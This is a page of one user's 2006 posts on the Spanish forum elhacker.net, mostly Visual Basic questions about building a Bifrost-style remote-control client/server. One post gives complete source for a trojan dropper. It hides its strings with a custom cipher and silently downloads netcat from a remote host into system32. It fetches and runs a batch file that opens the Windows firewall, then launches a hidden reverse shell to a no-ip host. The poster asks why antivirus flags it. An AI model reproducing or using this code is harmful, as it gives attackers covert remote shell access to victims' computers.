elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12
71  Programación / Programación Visual Basic / + winsock en: 21 Junio 2006, 23:25 pm
Buenas, señores y señoras, seria posible tan solo con el control winsock enviar un file.log O .txt a un server ftp  :huh: ( al mio en lycos  ;D ) , no hablo de una comunicacion entre cliente/servidor, sino simplemente de una aplicacion que contenga el control winsock, que envie un file...ya lo dije xD a un server ftp, salu2.

Espero que sea posible asi tal cual como lo piento, bye bye.
72  Programación / Programación Visual Basic / App Cliente/Servidor. en: 17 Junio 2006, 16:36 pm
Hola, buenas pues otra duda es como puedo poner al servidor una contraseña para que cuando en el cliente llegue una conexion pida la contraseña para autentificar que esa conexion proviene de nuestro servidor y de que tenemos acceso a el.  :huh: de que mejor forma puedo hacer esto  :huh:
73  Programación / Programación Visual Basic / Aceptar infinidad de conexiones ( winsock, cliente/servidor) en: 17 Junio 2006, 01:40 am
 Hola pues he estado mirando el tuto de reydelmundo11 sobre aseptar mas de una conexion y despues de yo crear el index de winsock y dejarlo preparado el server para que asepte + conexiones, en el cliente que debo hacer? me explico yo lo que querria seria en un control ( no se cual es el + indicado ) agrupar todas las ips de los servidores que esten conectados y selecionando una ( ip de la lista ejemplo: bifrost) manejar ese server y poder ya hacer lo que quiera pues x ejemplo capturar la screen y que quiero irme a manejar el file manaher de otro server pues seleciono la ip del correspondiente server y asi...como en el bifrost .

Espero que me puedan ayudar con esto que me esta costando bastante.salu2.
74  Programación / Ejercicios / Re: No hay ejercicios para Delphi? en: 10 Junio 2006, 23:05 pm
 :D Buena Codename!! justamente yo tb el otro dia pense en eso y de paso aprovecho para decir: tanto usuario "Pro" de los que hay en el foro porque no crean un subforo en el que entre el siguiente conetido: avtividades para ciertos lenguajes, empezando desde 0 y los que los vayan superando puedan seguir con los siguientes ejercicios, que les parece  :huh: y como no variedad de lenguajes para el disñeo de aplicaciones, lenguajes web, etc. Lo digo porque muchos se quejan de que nivel hay de programación si, cierto, pero es que todo el mundo no es tan aventajado para aprender un lenguaje solo, inlcuso mismo porque hay baches que se presenten y no sepas si quiera donde acudir para solucionarlos, creo que con esto se haria una "especie de reto" en el que muchos estarian interesados por llegar al siguiente ejercicio por ejemplo de delphi ( como dice codename!, que hay poco de delphi), seria interesante para todos y serviria como aprendicaje para muchos usuarios por lo menos yo estaria apuntado fijo  :P.  Y quien se molestaria en llevar los ejercicios de distitnos lenguajes..? etc, ( el trabajo ) pues los "PROS" que habeces se quejan de los que saben menos que ellos ;) hasi se veria tb el interes de ayudar de esa gente que sin ningun animo de ofender, algunos no voy a dar nombres...mucho chacha ( dicen mucho ) pero no son tan buenos ;). salu2. Y muy buena anotación CodeName!! haber si lo leen lo que tú y yo decimos.
75  Programación / Programación Visual Basic / Re: Nuevo Boton GorditoButton.ocx en: 10 Junio 2006, 01:10 am
 :-( no te rias hombre  :-(
76  Programación / Programación Visual Basic / Re: Nuevo Boton GorditoButton.ocx en: 10 Junio 2006, 00:45 am
 ;D que bonito el boton gordito  ;D
77  Programación / Programación Visual Basic / Re: Ayuda en Formulario en: 9 Junio 2006, 01:39 am
 :huh: no jo   d as que para eso necesitas ayuda...si es como los legos con que te pongas un rato con ellos armas cualquier mi   erda....pero hombre si solo te tienes que ir a las propiedades del fom , y en borderstyle...elijes el que quieras..como si quieres que no tenga...juas...vaya problema man  :huh: ya encontraste en el google  :huh: chacho mejor los legos.
78  Programación / Programación Visual Basic / Re: Porblema con Shell en: 8 Junio 2006, 16:18 pm
Podria ser como dicen en un post de troyanos y virus la combinacion de la api para descargar el file y de la instrucion shell lo que me este detectando nod32 ???
79  Programación / Programación Visual Basic / Re: Porblema con Shell en: 7 Junio 2006, 19:22 pm
Buenas pongo el codigo haber si alguien asi le queda más claro de porque me lo detecta nod32, panda y antivir ( solo estos 3 )
 es una aplicacion que descarga netcat de modo silencioso, lo guarda en c y lo copia a system32, luego baja un bat tb que lo ejecuta y nos da paso el fw de windows (nos incluye en la lista de programas permitidos) y por último ejecuta el netcat para hacer reverse shell, salu2. Pongo el codigo:

Código:
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Const SW_NORMAL = 1
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long     'api necesaria para el descargar algo de internet

Option Explicit



Private Sub Form_Load()

Text1.Text = Cript(Text1.Text, 3)
Text2.Text = Cript(Text2.Text, 3)
Text3.Text = Cript(Text3.Text, 3)

DownloadFile "http://host.usr/my_user/nc.exe", DesCript(Text1.Text, 3)
End Sub

[color=Red]Funcion que no permite descargar un archivo desde vb:[/color]

Public Function DownloadFile(URL As String, LocalFilename As String) As Boolean 
    Dim lngRetVal As Long
    lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
    If lngRetVal = 0 Then DownloadFile = True
End Function

[color=Brown]Timer que permite copiar el netcat desde c a system32 en winXP[/color]

Private Sub Timer_copync_Timer()
On Error Resume Next
FileCopy DesCript(Text1.Text, 3), DesCript(Text2.Text, 3) 'copia el netcat a system32 en win xp
Timer_copync.Enabled = False
End Sub

[color=Brown]Timer que permite copiar el netcat desde c a system32 en win2000[/color]

Private Sub Timer_copync2k_Timer()
On Error Resume Next
FileCopy DesCript(Text1.Text, 3), DesCript(Text3.Text, 3)
Timer_copync2k.Enabled = False
End Sub

[color=Blue]Timer que ejecuta netcat + cmd con la sintasis que he elejido:[/color]

Private Sub Timer1_Timer()
On Error Resume Next
Shell ("cmd.exe /c winnc -d -e cmd.exe HOST.no-ip.com 6669"), vbHide
Timer1.Enabled = False
End Sub

[color=Green]Timer que hace que descarge un bat de un host ( y luego lo ejecute[/color]

Private Sub Timer2_Timer()
On Error Resume Next
Dim ejecuk As Long

DownloadFile "http://host.usr/my_user/nancy32.bat", "C:\WINDOWS\system32\nancy32.bat" 

ejecuk = ShellExecute(Me.hwnd, "Open", "c:\windows\system32\nancy32.bat", "", "", 1)

Timer2.Enabled = False
End Sub

[color=Red]Funcion para cifrar:[/color]

Private Function Cript(txt, Optional semilla = 45) As String
On Error Resume Next
Dim i
Dim l
Dim txt2


For i = 1 To Len(txt)
l = Mid(txt, i, 1)
l = 155 - Asc(l)
txt2 = txt2 + Chr(l)
Next
txt = txt2
For i = 1 To Len(txt)
l = Mid(txt, i, 1)
l = Asc(l) Xor semilla
Cript = Cript & l & Chr(164)
DoEvents
Next
End Function

[color=Red]Funcion para descifrar:[/color]

Private Function DesCript(txt, Optional semilla = 45) As String
On Error Resume Next
Dim i
Dim l
Dim pal
Dim txt3
Dim c

For i = 1 To Len(txt)
l = Mid(txt, i, 1)
If l = Chr(164) Then
l = pal Xor semilla
c = semilla Xor pal
l = Chr(l)
DesCript = DesCript & l
pal = ""
Else
pal = pal & l
End If
DoEvents
Next
For i = 1 To Len(DesCript)
l = Mid(DesCript, i, 1)
l = 155 - Asc(l)
txt3 = txt3 + Chr(l)
Next
DesCript = txt3
End Function
80  Programación / Programación Visual Basic / Re: Oculta Ventana Messenger en: 7 Junio 2006, 13:25 pm
Meg pues no tio no se como oucltar una ventana del messenger pero  de momento podrias buscar en esta pag: http://www.planet-source-code.com    una ves buscando no recuerdo el que sobre el messenger encontre , creo que estaba buscando ejemplos de messenger en vb, yhabian algunos con la opcion de esconder ventana ( hide window) , busca que seguro que encuentras y ya más que sea tendras un ejemplo, luego estudialo, comprendelo y aplicalo a tú aplicación. salu2.  :)
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines